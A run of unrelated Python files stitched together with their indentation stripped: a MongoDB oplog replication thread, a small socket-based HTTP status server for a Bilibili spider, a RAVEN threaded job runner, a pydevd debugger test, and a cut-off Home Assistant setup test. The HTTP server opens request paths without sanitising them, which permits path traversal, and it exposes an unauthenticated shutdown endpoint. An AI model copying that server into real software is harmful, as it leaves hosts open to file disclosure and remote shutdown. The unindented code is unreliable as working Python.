LOG.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.checkpoint = last_ts
self.update_checkpoint()
LOG.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
def filter_oplog_entry(self, entry):
"""Remove fields from an oplog entry that should not be replicated."""
if not self._fields:
return entry
def pop_excluded_fields(doc):
for key in set(doc) - self._fields:
doc.pop(key)
entry_o = entry['o']
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
pop_excluded_fields(entry_o)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry['op'] == 'u' and ('$set' in entry_o or '$unset' in entry_o):
pop_excluded_fields(entry_o.get("$set", {}))
pop_excluded_fields(entry_o.get("$unset", {}))
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o['$set']:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o['$unset']:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry['op'] == 'u':
pop_excluded_fields(entry_o)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, filtering
entries not in the namespace set.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {}
if self.oplog_ns_set:
query['ns'] = {'$in': self.oplog_ns_set}
if timestamp is None:
cursor = self.oplog.find(
query,
tailable=True, await_data=True)
else:
query['ts'] = {'$gte': timestamp}
cursor = self.oplog.find(
query, tailable=True, await_data=True)
# Applying 8 as the mask to the cursor enables OplogReplay
cursor.add_option(8)
return cursor
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
dump_set = self.namespace_set or []
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
#no namespaces specified
if not self.namespace_set:
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs collections
if coll.endswith(".files") or coll.endswith(".chunks"):
continue
namespace = "%s.%s" % (database, coll)
dump_set.append(namespace)
timestamp = util.retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
def docs_to_dump(namespace):
database, coll = namespace.split('.', 1)
last_id = None
attempts = 0
# Loop to handle possible AutoReconnect
while attempts < 60:
target_coll = self.primary_client[database][coll]
if not last_id:
cursor = util.retry_until_ok(
target_coll.find,
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = util.retry_until_ok(
target_coll.find,
{"_id": {"$gt": last_id}},
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_inserted = 0
num_failed = 0
for namespace in dump_set:
for num, doc in enumerate(docs_to_dump(namespace)):
if num % 10000 == 0:
LOG.debug("Upserted %d docs." % num)
try:
mapped_ns = self.dest_mapping.get(namespace, namespace)
dm.upsert(doc, mapped_ns, long_ts)
num_inserted += 1
except Exception:
if self.continue_on_error:
LOG.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
LOG.debug("Upserted %d docs" % num_inserted)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
mapped_ns = self.dest_mapping.get(namespace, namespace)
dm.bulk_upsert(docs_to_dump(namespace), mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
# Dump the documents, bulk upsert if possible
if hasattr(dm, "bulk_upsert"):
LOG.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
else:
LOG.debug(
"OplogThread: DocManager %s has no "
"bulk_upsert method. Upserting documents "
"serially for collection dump." % str(dm))
upsert_each(dm)
# Dump GridFS files
for gridfs_ns in self.gridfs_set:
db, coll = gridfs_ns.split('.', 1)
mongo_coll = self.primary_client[db][coll]
dest_ns = self.dest_mapping.get(gridfs_ns, gridfs_ns)
for doc in docs_to_dump(gridfs_ns + '.files'):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical('Exception during collection dump',
exc_info=errors.get_nowait())
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
return timestamp
def get_last_oplog_timestamp(self):
"""Return the timestamp of the latest entry in the oplog.
"""
if not self.oplog_ns_set:
curr = self.oplog.find().sort(
'$natural', pymongo.DESCENDING
).limit(1)
else:
curr = self.oplog.find(
{'ns': {'$in': self.oplog_ns_set}}
).sort('$natural', pymongo.DESCENDING).limit(1)
if curr.count(with_limit_and_skip=True) == 0:
return None
LOG.debug("OplogThread: Last oplog entry has timestamp %d."
% curr[0]['ts'].time)
return curr[0]['ts']
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and the number of documents left in the cursor.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
if timestamp is None:
return None, 0
else:
# Collection dump disabled:
# return cursor to beginning of oplog.
cursor = self.get_oplog_cursor()
self.checkpoint = self.get_last_oplog_timestamp()
self.update_checkpoint()
return cursor, retry_until_ok(cursor.count)
self.checkpoint = timestamp
self.update_checkpoint()
for i in range(60):
cursor = self.get_oplog_cursor(timestamp)
cursor_len = retry_until_ok(cursor.count)
if cursor_len == 0:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
self.checkpoint = self.rollback()
self.update_checkpoint()
return self.init_cursor()
# try to get the first oplog entry
try:
first_oplog_entry = retry_until_ok(next, cursor)
except StopIteration:
# It's possible for the cursor to become invalid
# between the cursor.count() call and now
time.sleep(1)
continue
# first entry should be last oplog entry processed
cursor_ts_long = util.bson_ts_to_long(
first_oplog_entry.get("ts"))
given_ts_long = util.bson_ts_to_long(timestamp)
if cursor_ts_long > given_ts_long:
# first entry in oplog is beyond timestamp
# we've fallen behind
return None, 0
# first entry has been consumed
return cursor, cursor_len - 1
else:
raise errors.MongoConnectorError(
"Could not initialize oplog cursor.")
def update_checkpoint(self):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if self.checkpoint is not None:
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
oplog_dict[str(self.oplog)] = self.checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s" %
str(self.checkpoint))
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
if oplog_str in oplog_dict.keys():
ret_val = oplog_dict[oplog_str]
LOG.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}},
sort=[('$natural', pymongo.DESCENDING)]
)
LOG.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = namespace
for source_name, dest_name in self.dest_mapping.items():
if dest_name == namespace:
original_namespace = source_name
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
fields=self.fields
)
#doc list are docs in target system, to_update are
#docs in mongo
doc_hash = {} # hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
#delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(document_id, namespace,
util.bson_ts_to_long(rollback_cutoff_ts))
remov_inc += 1
LOG.debug(
"OplogThread: Rollback, removed %r " % doc)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
#insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(doc,
self.dest_mapping.get(namespace, namespace),
util.bson_ts_to_long(rollback_cutoff_ts))
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception("OplogThread: Rollback, Unable to "
"insert %r" % doc)
LOG.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
|
httpsever.py
|
# coding:utf-8
########
# 参考:https://www.cnblogs.com/xinyangsdut/p/9099623.html
########
import socket
import re
import psutil
import json
import os
import time
from threading import Thread
from queue import Queue
# 设置静态文件根目录
HTML_ROOT_DIR = "./html"
os.chdir(os.path.dirname(__file__))
class HTTPServer(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.tcp_spider_connection = 0
self.spider_status = {}
self.exit_mes = False
self.content_type ={
"css":r"text/css",
"html":r"text/html",
"htm":r"text/html",
"js":r"application/x-javascript",
"ico":r"image/x-icon",
"png":r"image/png",
"jpg":r"image/jpeg"
}
def start(self):
self.server_socket.listen(128)
while not self.exit_mes:
client_socket, client_address = self.server_socket.accept()
print("[%s, %s]用户连接上了" % client_address)
handle_client_process = Thread(
target=self.handle_client, args=(client_socket,client_address))
handle_client_process.start()
#client_socket.close()
#print(self.spider_status)
def handle_client(self, client_socket,client_address):
"""
处理客户端请求
"""
# 获取客户端请求数据
request_data = client_socket.recv(1024).decode()
request_lines = request_data.splitlines()
if len(request_lines) > 0:
# 解析请求报文
request_start_line = request_lines[0]
else:
client_socket.close()
return
if "HTTP" in request_start_line:
self.handle_http(request_lines,request_start_line,client_socket,client_address)
elif "BilispiderSocket" in request_start_line:
self.handle_spidersocket(request_lines,request_start_line,client_socket,client_address)
else:
client_socket.send(b"NON_SUPPORT")
client_socket.close()
#print("response data:\n", response)
def handle_spidersocket(self,request_lines,request_start_line,client_socket,client_address):
self.spidersocket = BilispiderSocket(client_socket,client_address)
self.tcp_spider_connection += 1
self.spidersocket.receive()
self.tcp_spider_connection -= 1
# try:
# while True:
# msg = client_socket.recv(1024)
# client_socket.send(msg)
# except ConnectionResetError:
# print("连接中断")
def handle_http(self,request_lines,request_start_line,client_socket,client_address):
# 设置响应头
response_headers = "Server: BiliSpider server\r\n"\
"Access-Control-Allow-Origin:*\r\n"\
"Access-Control-Allow-Method:POST,GET\r\n"
# 提取用户请求的文件名
file_name = re.match(
r"\w+ +(/[^ ]*) ", request_start_line).group(1)
if "/" == file_name:
file_name = "/index.html"
if len(file_name) >= 5 and file_name[:5] == '/data':
response_start_line = "HTTP/1.1 200 OK\r\n"
response_headers += "Content-Type: application/json\r\n"
response_body = json.dumps({'sys': self.get_sysinfo(),
'spider': self.get_status(),
},indent=4)
elif len(file_name) >= 5 and file_name[:5] == '/post':
self.set_status(json.loads(request_lines[-1]))
response_body = 'received!'
response_start_line = "HTTP/1.1 200 OK\r\n"
elif len(file_name) >= 5 and file_name[:5] == '/exit':
response_body = 'received exit command!'
self.exit_mes = True
from time import sleep
response_start_line = "HTTP/1.1 200 OK\r\n"
#response_headers = "Server: BiliSpider server\r\n"
else:
# 打开文件,读取内容
try:
file = open(HTML_ROOT_DIR + file_name, "rb")
except IOError:
response_start_line = "HTTP/1.1 404 Not Found\r\n"
#response_headers = "Server: BiliSpider server\r\n"
response_body = "The file is not found!"
else:
file_data = file.read()
file.close()
# 构造响应数据
response_headers += "Content-Type: " + self.content_type.get(file_name.rsplit('.',1)[1],r"application/octet-stream") + "\r\n"
response_start_line = "HTTP/1.1 200 OK\r\n"
#response_headers = "Server: BiliSpider server\r\n"
response_body = file_data
if isinstance(response_body,bytes):
pass
elif isinstance(response_body,str):
response_body = response_body.encode('utf-8')
else:
response_body = str(response_body).encode('utf-8')
response = bytes(response_start_line + response_headers + "\r\n" , 'utf-8')+ response_body
# 向客户端返回响应数据
client_socket.send(response)
# 关闭客户端连接
client_socket.close()
def get_status(self):
if self.tcp_spider_connection:
msg_id = self.spidersocket.send("get_status",True)
try:
return(json.loads(self.spidersocket.get_response(msg_id)))
except:
print("tcp通讯失败")
return self.spider_status
else:
return self.spider_status
def bind(self, port):
self.server_socket.bind(("", port))
@classmethod
def get_sysinfo(self):
# 获取内存信息
mem_keys = ('total', 'available', 'percent', 'used', 'free')
mem_svmem = psutil.virtual_memory()
mem_info = {}
for i in range(len(mem_keys)):
mem_info[mem_keys[i]] = mem_svmem[i]
# 获取CPU使用率
cpu_info = {'usage': psutil.cpu_percent(percpu=True)}
# 获取网络IO
net_keys = ('bytes_sent', 'bytes_recv', 'packets_sent',
'packets_recv', 'errin', 'errout', 'dropin', 'dropout')
net_snetio = psutil.net_io_counters()
net_info = {}
for i in range(len(net_keys)):
net_info[net_keys[i]] = net_snetio[i]
sys_info = {'mem': mem_info, 'cpu': cpu_info, 'net': net_info}
return sys_info
def set_status(self,status):
self.spider_status.update(status)
class BilispiderSocket(object):
def __init__(self,client_socket,client_address):
self.client_socket = client_socket
self.client_address = client_address
self.message = {}
self.message_id = set()
print("hello")
self.send("hello")
print("hello")
def receive(self):
while True:
try:
data = self.client_socket.recv(1024).decode()
except ConnectionResetError:
print("与{}连接中断".format(self.client_address[0]))
return
request_start_line,request_content = data.split("\n",1)
if "BilispiderSocket" not in request_start_line:
self.send("not support")
else:
msg_id = int(request_start_line.split("/")[-1])
if msg_id in self.message:
self.message[msg_id].put(request_content)
Thread(target=self.handle_msg,args=(request_content,msg_id)).start()
#msg_id = self.send(request_content,response=True)
# content = self.get_response(msg_id)
# self.send(msg_id+content)
def send(self,msg,response = 0):
if response:
msg_id = int(time.time()*10000)%10000000000
self.message_id.add(msg_id)
self.message[msg_id] = Queue(1)
else:
msg_id = 0
data = "BilispiderSocket /{} \n{}".format(msg_id,msg).encode()
Thread(target=self.client_socket.send,args=(data,),name="socketsender").start()
return msg_id
def get_response(self,msg_id):
if msg_id in self.message_id:
self.message_id.remove(msg_id)
else:
return ""
# while True:
# if msg_id in self.message:
# return self.message.pop(msg_id)
# else:
# time.sleep(0.1)
msg = self.message[msg_id].get(timeout=2)
del self.message[msg_id]
return msg
def handle_msg(self,content,msg_id):
if not msg_id:
print(content)
msg_id = self.send(content,response=True)
print(self.get_response(msg_id))
self.send("received")
else:
print(msg_id)
def close(self):
self.client_socket.close()
def main(port=1214):
http_server = HTTPServer()
http_server.bind(port)
http_server.start()
if __name__ == "__main__":
main()
|
SharedMemoryRunner.py
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on September 12, 2016
"""
#for future compatibility with Python 3--------------------------------------------------------------
from __future__ import division, print_function, unicode_literals, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
#End compatibility block for Python 3----------------------------------------------------------------
#External Modules------------------------------------------------------------------------------------
import collections
import subprocess
# try : import Queue as queue
# except ImportError: import queue
import os
import signal
import copy
import abc
import time
import ctypes
import inspect
#import logging, logging.handlers
import threading
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from utils import utils
from BaseClasses import BaseType
import MessageHandler
from .InternalRunner import InternalRunner
#Internal Modules End--------------------------------------------------------------------------------
class SharedMemoryRunner(InternalRunner):
"""
Class for running internal objects in a threaded fashion using the built-in
threading library
"""
def __init__(self, messageHandler, args, functionToRun, identifier=None, metadata=None, uniqueHandler = "any", profile = False):
"""
Init method
@ In, messageHandler, MessageHandler object, the global RAVEN message
handler object
@ In, args, dict, this is a list of arguments that will be passed as
function parameters into whatever method is stored in functionToRun.
e.g., functionToRun(*args)
@ In, functionToRun, method or function, function that needs to be run
@ In, identifier, string, optional, id of this job
@ In, metadata, dict, optional, dictionary of metadata associated with
this run
@ In, uniqueHandler, string, optional, it is a special keyword attached to
this runner. For example, if present, to retrieve this runner using the
method jobHandler.getFinished, the uniqueHandler needs to be provided.
If uniqueHandler == 'any', every "client" can get this runner
@ In, clientRunner, bool, optional, Is this runner needed to be executed in client mode? Default = False
@ In, profile, bool, optional, if True then at deconstruction timing statements will be printed
@ Out, None
"""
## First, allow the base class handle the commonalities
# we keep the command here, in order to have the hook for running exec code into internal models
super(SharedMemoryRunner, self).__init__(messageHandler, args, functionToRun, identifier, metadata, uniqueHandler, profile)
## Other parameters manipulated internally
self.subque = collections.deque()
#self.subque = queue.Queue()
self.skipOnCopy.append('subque')
def isDone(self):
"""
Method to check if the calculation associated with this Runner is finished
@ In, None
@ Out, finished, bool, is it finished?
"""
## If the process has not been started yet, then return False
if not self.started:
return False
if self.thread is None:
return True
else:
return not self.thread.is_alive()
def getReturnCode(self):
"""
Returns the return code from running the code. If return code not yet
set, then set it.
@ In, None
@ Out, returnCode, int, the return code of this evaluation
"""
if not self.hasBeenAdded:
self._collectRunnerResponse()
## Is this necessary and sufficient for all failed runs?
if len(self.subque) == 0 and self.runReturn is None:
self.runReturn = None
self.returnCode = -1
return self.returnCode
def _collectRunnerResponse(self):
"""
Method to add the process response in the internal variable (pointer)
self.runReturn
@ In, None
@ Out, None
"""
if not self.hasBeenAdded:
if len(self.subque) == 0:
## Queue is empty!
self.runReturn = None
else:
self.runReturn = self.subque.popleft()
self.hasBeenAdded = True
def start(self):
"""
Method to start the job associated to this Runner
@ In, None
@ Out, None
"""
try:
self.thread = InterruptibleThread(target = lambda q, *arg : q.append(self.functionToRun(*arg)),
name = self.identifier,
args=(self.subque,) + tuple(self.args))
self.thread.daemon = True
self.thread.start()
self.trackTime('runner_started')
self.started = True
except Exception as ae:
self.raiseAWarning(self.__class__.__name__ + " job "+self.identifier+" failed with error:"+ str(ae) +" !",'ExceptedError')
self.returnCode = -1
def kill(self):
"""
Method to kill the job associated to this Runner
@ In, None
@ Out, None
"""
if self.thread is not None:
self.raiseADebug('Terminating job thread "{}" and RAVEN identifier "{}"'.format(self.thread.ident, self.identifier))
while self.thread is not None and self.thread.isAlive():
time.sleep(0.1)
try:
self.thread.raiseException(RuntimeError)
except ValueError:
self.thread = None
self.trackTime('runner_killed')
## The following code is extracted from stack overflow with some minor cosmetic
## changes in order to adhere to RAVEN code standards:
## https://stackoverflow.com/questions/323972/is-there-any-way-to-kill-a-thread-in-python
def _asyncRaise(tid, exceptionType):
"""
Raises an exception in the threads with id tid
@ In, tid, integer, this variable represents the id of the thread to raise an exception
@ In, exceptionType, Exception, the type of exception to throw
@ Out, None
"""
if not inspect.isclass(exceptionType):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exceptionType))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
class InterruptibleThread(threading.Thread):
"""
A thread class that supports raising exception in the thread from another thread.
"""
def raiseException(self, exceptionType):
"""
Raises the given exception type in the context of this thread.
If the thread is busy in a system call (time.sleep(), socket.accept(), ...), the exception is simply ignored.
If you are sure that your exception should terminate the thread, one way to ensure that it works is:
t = InterruptibleThread( ... )
...
t.raiseException( SomeException )
while t.isAlive():
time.sleep( 0.1 )
t.raiseException( SomeException )
If the exception is to be caught by the thread, you need a way to check that your thread has caught it.
CAREFUL : this function is executed in the context of the caller thread, to raise an excpetion in the context of the
thread represented by this instance.
@ In, exceptionType, Exception, the type of exception to raise in this thread
@ Out, None
"""
if self.isAlive():
## Assuming Python 2.6+, we can remove the need for the _get_my_tid as
## specifed in the Stack Overflow answer
_asyncRaise( self.ident, exceptionType )
|
_debugger_case_check_tracer.py
|
import threading, atexit, sys
from collections import namedtuple
import os.path
if sys.version_info[0] >= 3:
from _thread import start_new_thread
else:
from thread import start_new_thread
FrameInfo = namedtuple('FrameInfo', 'filename, name, f_trace')
def _atexit():
sys.stderr.flush()
sys.stdout.flush()
# Register the TEST SUCEEDED msg to the exit of the process.
atexit.register(_atexit)
def _iter_frame_info(frame):
while frame is not None:
yield FrameInfo(
os.path.basename(frame.f_code.co_filename),
frame.f_code.co_name,
frame.f_trace.__name__ if frame.f_trace is not None else "None"
)
frame = frame.f_back
def check_frame_info(expected):
found = list(_iter_frame_info(sys._getframe().f_back))
def fail():
raise AssertionError('Expected:\n%s\n\nFound:\n%s\n' % (
'\n'.join(str(x) for x in expected),
'\n'.join(str(x) for x in found)))
for found_info, expected_info in zip(found, expected):
if found_info.filename != expected_info.filename or found_info.name != expected_info.name:
fail()
for f_trace in expected_info.f_trace.split('|'):
if f_trace == found_info.f_trace:
break
else:
fail()
def thread_func():
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='_bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='_bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='__bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='__bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None'),
])
th = threading.Thread(target=thread_func)
th.daemon = True
th.start()
event = threading.Event()
def thread_func2():
try:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func2', f_trace='trace_exception'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='trace_unhandled_exceptions')
])
finally:
event.set()
start_new_thread(thread_func2, ())
event.wait()
th.join()
# This is a bit tricky: although we waited on the event, there's a slight chance
# that we didn't get the notification because the thread could've stopped executing,
# so, sleep a bit so that the test does not become flaky.
import time
time.sleep(.3)
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='_pydev_execfile.py', name='execfile', f_trace='None'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None'),
])
print('TEST SUCEEDED')
|
test_setup.py
|
"""Test component/platform setup."""
# pylint: disable=protected-access
import asyncio
import os
from unittest import mock
import threading
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_COMPONENT_LOADED)
import homeassistant.config as config_util
from homeassistant import setup, loader
import homeassistant.util.dt as dt_util
from homeassistant.helpers.config_validation import (
PLATFORM_SCHEMA, PLATFORM_SCHEMA_BASE)
from homeassistant.helpers import discovery
from tests.common import \
get_test_home_assistant, MockModule, MockPlatform, \
assert_setup_component, get_test_config_dir, mock_integration, \
mock_entity_platform
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
VERSION_PATH = os.path.join(get_test_config_dir(), config_util.VERSION_FILE)
_LOGGER = logging.getLogger(__name__)
class TestSetup:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Set up the test."""
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
self.hass.stop()
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({
'comp_conf': {
'hello': str
}
}, required=True)
mock_integration(
self.hass,
MockModule('comp_conf', config_schema=config_schema))
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': None
})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': {}
})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(0):
assert not setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
self.hass.data.pop(setup.DATA_SETUP)
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
}
})
def test_validate_platform_config(self, caplog):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
platform_schema_base = PLATFORM_SCHEMA_BASE.extend({
})
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema_base=platform_schema_base),
)
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform(platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
'invalid': 'extra',
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 1
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(2):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
